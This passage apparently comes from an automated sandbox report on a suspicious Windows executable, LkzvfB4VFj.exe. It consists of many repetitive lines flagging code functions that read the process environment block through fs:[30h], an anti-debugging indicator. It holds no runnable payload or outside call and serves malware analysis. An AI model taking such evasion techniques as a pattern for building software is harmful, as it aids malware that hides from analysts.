      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9510D mov eax, dword ptr fs:[00000030h]3_2_35F9510D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F890F8 mov eax, dword ptr fs:[00000030h]3_2_35F890F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F890F8 mov eax, dword ptr fs:[00000030h]3_2_35F890F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F890F8 mov eax, dword ptr fs:[00000030h]3_2_35F890F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F890F8 mov eax, dword ptr fs:[00000030h]3_2_35F890F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCD0F0 mov eax, dword ptr fs:[00000030h]3_2_35FCD0F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCD0F0 mov ecx, dword ptr fs:[00000030h]3_2_35FCD0F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601330C mov eax, dword ptr fs:[00000030h]3_2_3601330C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601330C mov eax, dword ptr fs:[00000030h]3_2_3601330C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601330C mov eax, dword ptr fs:[00000030h]3_2_3601330C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601330C mov eax, dword ptr fs:[00000030h]3_2_3601330C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F30A mov eax, dword ptr fs:[00000030h]3_2_3604F30A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAB0D0 mov eax, dword ptr fs:[00000030h]3_2_35FAB0D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B0D6 mov eax, dword ptr fs:[00000030h]3_2_35F8B0D6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B0D6 mov eax, dword ptr fs:[00000030h]3_2_35F8B0D6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B0D6 mov eax, dword ptr fs:[00000030h]3_2_35F8B0D6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B0D6 mov eax, dword ptr fs:[00000030h]3_2_35F8B0D6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36063336 mov eax, dword ptr fs:[00000030h]3_2_36063336
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97072 mov eax, dword ptr fs:[00000030h]3_2_35F97072
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F38A mov eax, dword ptr fs:[00000030h]3_2_3604F38A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91051 mov eax, dword ptr fs:[00000030h]3_2_35F91051
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91051 mov eax, dword ptr fs:[00000030h]3_2_35F91051
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8D02D mov eax, dword ptr fs:[00000030h]3_2_35F8D02D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB5004 mov eax, dword ptr fs:[00000030h]3_2_35FB5004
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB5004 mov ecx, dword ptr fs:[00000030h]3_2_35FB5004
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC33D0 mov eax, dword ptr fs:[00000030h]3_2_35FC33D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606505B mov eax, dword ptr fs:[00000030h]3_2_3606505B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36039060 mov eax, dword ptr fs:[00000030h]3_2_36039060
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91380 mov eax, dword ptr fs:[00000030h]3_2_35F91380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91380 mov eax, dword ptr fs:[00000030h]3_2_35F91380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91380 mov eax, dword ptr fs:[00000030h]3_2_35F91380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91380 mov eax, dword ptr fs:[00000030h]3_2_35F91380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91380 mov eax, dword ptr fs:[00000030h]3_2_35F91380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF380 mov eax, dword ptr fs:[00000030h]3_2_35FAF380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF380 mov eax, dword ptr fs:[00000030h]3_2_35FAF380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF380 mov eax, dword ptr fs:[00000030h]3_2_35FAF380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF380 mov eax, dword ptr fs:[00000030h]3_2_35FAF380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF380 mov eax, dword ptr fs:[00000030h]3_2_35FAF380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF380 mov eax, dword ptr fs:[00000030h]3_2_35FAF380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36017090 mov eax, dword ptr fs:[00000030h]3_2_36017090
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B360 mov eax, dword ptr fs:[00000030h]3_2_35F9B360
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B360 mov eax, dword ptr fs:[00000030h]3_2_35F9B360
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B360 mov eax, dword ptr fs:[00000030h]3_2_35F9B360
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B360 mov eax, dword ptr fs:[00000030h]3_2_35F9B360
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B360 mov eax, dword ptr fs:[00000030h]3_2_35F9B360
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B360 mov eax, dword ptr fs:[00000030h]3_2_35F9B360
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604B0AF mov eax, dword ptr fs:[00000030h]3_2_3604B0AF
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360650B7 mov eax, dword ptr fs:[00000030h]3_2_360650B7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB332D mov eax, dword ptr fs:[00000030h]3_2_35FB332D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F89303 mov eax, dword ptr fs:[00000030h]3_2_35F89303
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F89303 mov eax, dword ptr fs:[00000030h]3_2_35F89303
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8D2EC mov eax, dword ptr fs:[00000030h]3_2_35F8D2EC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8D2EC mov eax, dword ptr fs:[00000030h]3_2_35F8D2EC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F872E0 mov eax, dword ptr fs:[00000030h]3_2_35F872E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F13E mov eax, dword ptr fs:[00000030h]3_2_3604F13E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC32C0 mov eax, dword ptr fs:[00000030h]3_2_35FC32C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC32C0 mov eax, dword ptr fs:[00000030h]3_2_35FC32C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB32C5 mov eax, dword ptr fs:[00000030h]3_2_35FB32C5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602D140 mov eax, dword ptr fs:[00000030h]3_2_3602D140
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602D140 mov eax, dword ptr fs:[00000030h]3_2_3602D140
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602314A mov eax, dword ptr fs:[00000030h]3_2_3602314A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602314A mov eax, dword ptr fs:[00000030h]3_2_3602314A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602314A mov eax, dword ptr fs:[00000030h]3_2_3602314A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602314A mov eax, dword ptr fs:[00000030h]3_2_3602314A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36065149 mov eax, dword ptr fs:[00000030h]3_2_36065149
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36063157 mov eax, dword ptr fs:[00000030h]3_2_36063157
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36063157 mov eax, dword ptr fs:[00000030h]3_2_36063157
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36063157 mov eax, dword ptr fs:[00000030h]3_2_36063157
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F892AF mov eax, dword ptr fs:[00000030h]3_2_35F892AF
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97290 mov eax, dword ptr fs:[00000030h]3_2_35F97290
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97290 mov eax, dword ptr fs:[00000030h]3_2_35F97290
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97290 mov eax, dword ptr fs:[00000030h]3_2_35F97290
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B273 mov eax, dword ptr fs:[00000030h]3_2_35F8B273
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B273 mov eax, dword ptr fs:[00000030h]3_2_35F8B273
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B273 mov eax, dword ptr fs:[00000030h]3_2_35F8B273
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360651B6 mov eax, dword ptr fs:[00000030h]3_2_360651B6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF24A mov eax, dword ptr fs:[00000030h]3_2_35FBF24A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602D1F0 mov eax, dword ptr fs:[00000030h]3_2_3602D1F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9BDE0 mov eax, dword ptr fs:[00000030h]3_2_35F9BDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBFDE0 mov eax, dword ptr fs:[00000030h]3_2_35FBFDE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FE1F mov eax, dword ptr fs:[00000030h]3_2_3600FE1F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FE1F mov eax, dword ptr fs:[00000030h]3_2_3600FE1F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FE1F mov eax, dword ptr fs:[00000030h]3_2_3600FE1F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FE1F mov eax, dword ptr fs:[00000030h]3_2_3600FE1F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025E30 mov eax, dword ptr fs:[00000030h]3_2_36025E30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025E30 mov ecx, dword ptr fs:[00000030h]3_2_36025E30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025E30 mov eax, dword ptr fs:[00000030h]3_2_36025E30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025E30 mov eax, dword ptr fs:[00000030h]3_2_36025E30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025E30 mov eax, dword ptr fs:[00000030h]3_2_36025E30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025E30 mov eax, dword ptr fs:[00000030h]3_2_36025E30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8DDB0 mov eax, dword ptr fs:[00000030h]3_2_35F8DDB0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97DB6 mov eax, dword ptr fs:[00000030h]3_2_35F97DB6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600DE50 mov eax, dword ptr fs:[00000030h]3_2_3600DE50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600DE50 mov eax, dword ptr fs:[00000030h]3_2_3600DE50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600DE50 mov ecx, dword ptr fs:[00000030h]3_2_3600DE50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600DE50 mov eax, dword ptr fs:[00000030h]3_2_3600DE50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600DE50 mov eax, dword ptr fs:[00000030h]3_2_3600DE50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCBD71 mov eax, dword ptr fs:[00000030h]3_2_35FCBD71
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCBD71 mov eax, dword ptr fs:[00000030h]3_2_35FCBD71
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA5D60 mov eax, dword ptr fs:[00000030h]3_2_35FA5D60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91D50 mov eax, dword ptr fs:[00000030h]3_2_35F91D50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91D50 mov eax, dword ptr fs:[00000030h]3_2_35F91D50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADD4D mov eax, dword ptr fs:[00000030h]3_2_35FADD4D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADD4D mov eax, dword ptr fs:[00000030h]3_2_35FADD4D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADD4D mov eax, dword ptr fs:[00000030h]3_2_35FADD4D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F89D46 mov eax, dword ptr fs:[00000030h]3_2_35F89D46
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F89D46 mov eax, dword ptr fs:[00000030h]3_2_35F89D46
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F89D46 mov ecx, dword ptr fs:[00000030h]3_2_35F89D46
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36017EC3 mov eax, dword ptr fs:[00000030h]3_2_36017EC3
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36017EC3 mov ecx, dword ptr fs:[00000030h]3_2_36017EC3
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36059ED2 mov eax, dword ptr fs:[00000030h]3_2_36059ED2
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8FD20 mov eax, dword ptr fs:[00000030h]3_2_35F8FD20
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36033EFC mov eax, dword ptr fs:[00000030h]3_2_36033EFC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FF03 mov eax, dword ptr fs:[00000030h]3_2_3600FF03
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FF03 mov eax, dword ptr fs:[00000030h]3_2_3600FF03
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600FF03 mov eax, dword ptr fs:[00000030h]3_2_3600FF03
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87CF1 mov eax, dword ptr fs:[00000030h]3_2_35F87CF1
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F93CF0 mov eax, dword ptr fs:[00000030h]3_2_35F93CF0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F93CF0 mov eax, dword ptr fs:[00000030h]3_2_35F93CF0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADCD1 mov eax, dword ptr fs:[00000030h]3_2_35FADCD1
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADCD1 mov eax, dword ptr fs:[00000030h]3_2_35FADCD1
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FADCD1 mov eax, dword ptr fs:[00000030h]3_2_35FADCD1
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9FCC9 mov eax, dword ptr fs:[00000030h]3_2_35F9FCC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC9CCF mov eax, dword ptr fs:[00000030h]3_2_35FC9CCF
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604BF4D mov eax, dword ptr fs:[00000030h]3_2_3604BF4D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97C95 mov eax, dword ptr fs:[00000030h]3_2_35F97C95
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97C95 mov eax, dword ptr fs:[00000030h]3_2_35F97C95
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87C85 mov eax, dword ptr fs:[00000030h]3_2_35F87C85
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87C85 mov eax, dword ptr fs:[00000030h]3_2_35F87C85
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87C85 mov eax, dword ptr fs:[00000030h]3_2_35F87C85
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87C85 mov eax, dword ptr fs:[00000030h]3_2_35F87C85
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87C85 mov eax, dword ptr fs:[00000030h]3_2_35F87C85
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCBC6E mov eax, dword ptr fs:[00000030h]3_2_35FCBC6E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCBC6E mov eax, dword ptr fs:[00000030h]3_2_35FCBC6E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov ecx, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov ecx, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov ecx, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov ecx, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov ecx, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov ecx, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C60 mov eax, dword ptr fs:[00000030h]3_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8DC40 mov eax, dword ptr fs:[00000030h]3_2_35F8DC40
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C40 mov eax, dword ptr fs:[00000030h]3_2_35FA3C40
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36011FC9 mov eax, dword ptr fs:[00000030h]3_2_36011FC9
